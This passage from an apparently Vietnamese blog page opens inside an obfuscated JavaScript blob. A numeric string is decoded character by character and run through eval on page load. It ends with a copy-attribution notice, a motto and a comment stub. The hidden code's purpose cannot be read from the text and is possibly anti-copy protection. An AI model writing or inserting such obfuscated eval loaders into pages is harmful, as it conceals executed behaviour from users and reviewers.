34A1505E2009E1540D1855D1876D1547A1806F1512B1512E1820C1820F1449D1834E1505E2009F1540B1855C1876B1547A1806C1512C1505F1820D1477F1981F1477A1981A1967C1988C1876C1456F1582A1876E1806D1834F1505E2009C1540C1855A1876F1547A1806C1512C1519C1820A1820F1596E1883C1988D1939A1862A1981B1904A1946F1939D1449D1456F2030C1904F1883B1449B1876C1806E1834E1505B2009D1540B1855F1876E1547B1806B1512B1526D1820C1820D1596F1596F1533A1435F1435C1876F1806D1834E1505C2009E1540B1855A1876C1547D1806A1512D1533B1820C1820C1596D1596C1519F1505E1505E1456A2030C1981B1988A1848B1939E1596F1876E1806F1834A1505A2009C1540C1855F1876D1547F1806A1512A1547A1820A1820E1806B1834C1505C2009E1540F1855B1876A1547C1806E1512A1540C1820E1820B1449D1498A1981C1946E1918A1876A1939C1596A1449F1491C1470F1456F1435F1498C1456D1806F1512D1820D1582F1876E1806A1834D1505A2009D1540A1855A1876E1547A1806E1512F1554C1820B1820B1582C1995D1848F1967A1393C1834F1505B2009F1533B1533F1519A1883A2009F1855F1596D1393C1939A1876F2002F1393B1785B1708E1701D1673E1981B1981B1953D1743D1876F1960B1988E1876D1974F1981D1582F1995D1848D1967D1393C1981B1596A1834D1505B2009A1540F1855C1876C1547C1806E1512E1561E1820E1582F1995C1848E1967F1393D1939D1596C1834F1505A2009A1540D1855D1876B1547D1806B1554E1820F1470D1883B1855F1834B1869E1981F1974C1890E1470D1834E1505F2009D1540F1855C1876D1547C1806F1561B1820C1470E1904B1869A1834E1848A1953F1953E1470D1834A1505B2009D1540E1855B1876C1547F1806F1568C1820C1582A1834E1505F2009C1533C1533C1519C1883B2009E1855A1806B1834D1505D2009B1540D1855D1876F1547F1806F1512C1512E1820A1820B1449B1834F1505E2009B1540B1855B1876D1547A1806D1512E1505A1820F1477B1981C1477C1981C1967C1988F1876A1456E1582C1834A1505B2009C1533A1533E1519E1883B2009C1855C1806B1834E1505D2009E1540F1855E1876F1547E1806C1512A1519B1820F1820A1596A1883B1988C1939C1862A1981B1904C1946F1939B1449D1456E2030D1904F1883C1449F1834E1505A2009F1533D1533A1519D1883A2009F1855F1806E1834A1505D2009C1540F1855E1876E1547E1806F1512B1526A1820C1820D1596E1596F1533F1435C1435F1834E1505F2009D1533F1533C1519E1883C2009F1855A1806C1834F1505A2009C1540D1855F1876E1547E1806F1512D1533A1820A1820B1596D1596E1519C1505E1505F1456B2030F1932A1848D1855A1848C1946D1932A1848B1981E1596B1834E1505C2009A1533B1533D1519F1883A2009B1855E1806C1834A1505E2009F1540D1855B1876E1547C1806F1512A1547D1820D1820E1806C1834E1505D2009B1540E1855A1876C1547A1806A1512C1540B1820D1820B1449C1498A1981E1946C1918B1876C1939A1596D1449B1491A1470E1456B1435E1498F1456A1806B1512D1820B1582B1834E1505C2009A1533E1533C1519F1883F2009A1855D1806F1834F1505F2009B1540F1855D1876B1547B1806D1512D1554B1820D1820F1582A1974C1925A1876F1876B1953D1449F1869D1876B1925A1848F2016E1834A1981E1904D1932A1876A1456D1582B1925F1946A1862A1848F1981F1904A1946D1939C1806F1834C1505B2009F1540A1855E1876E1547F1806E1512C1568E1820B1820A1596A1925A1904D1918D1876E1540B1974C1470E1981C1988D1848E1939A2044C2044D1582E1834E1505D2009C1533D1533D1519B1883F2009A1855E1806F1834D1505C2009A1540F1855E1876B1547C1806C1519A1505D1820F1820E1449C1939A1456D2044F2044B1582B1876F1806B1834F1505F2009A1540E1855E1876C1547C1806C1519E1505F1820C1820D1449A1939C1456B1582C1239C1239C';var _7032=/[\x41\x42\x43\x44\x45\x46]/;var _7288=2;var _9131=_6935.charAt(_6935.length-1);var _1578;var _2929=_6935.split(_7032);var _6436=[String.fromCharCode,isNaN,parseInt,String];_2929[1]=_6436[_7288+1](_6436[_7288](_2929[1])/21);var _3534=(_7288==7)?String:eval;_1578='';_11=_6436[_7288](_2929[0])/_6436[_7288](_2929[1]);for(_9994=3;_9994<_11;_9994++)_1578+=(_6436[_7288-2]((_6436[_7288](_2929[_9994])+_6436[_7288](_2929[2])+_6436[_7288](_2929[1]))/_6436[_7288](_2929[1])-_6436[_7288](_2929[2])+_6436[_7288](_2929[1])-1));var _3594='_5382';var _4796='_3594=_1578';function _4760(_2518){_3534(_9168);_4760(_6525);_6525(_4796);_4760(_3594);}var _9168='_4760=_3534';var _6525='_6525=_4760';_4760(_9131);Mọi Bài Đăng Đều Được Viết Bởi Tác Giả Blog, Vui Lòng Ghi Nguồn Nguyyễn Văn Kiên ✔️ Khi Copy Bài Đăng Từ Trang Này!

Admin: Nguyễn Văn Kiên

[...] Hãy bắt đầu làm những việc cần thiết, sau đó làm những việc bạn có thể và tự nhiên bạn có thể làm những điều không thể ✔️

Phản Hồi Độc Giả

1 nhận xét :


Biểu Tượng Cảm XúcBiểu Tượng Cảm Xúc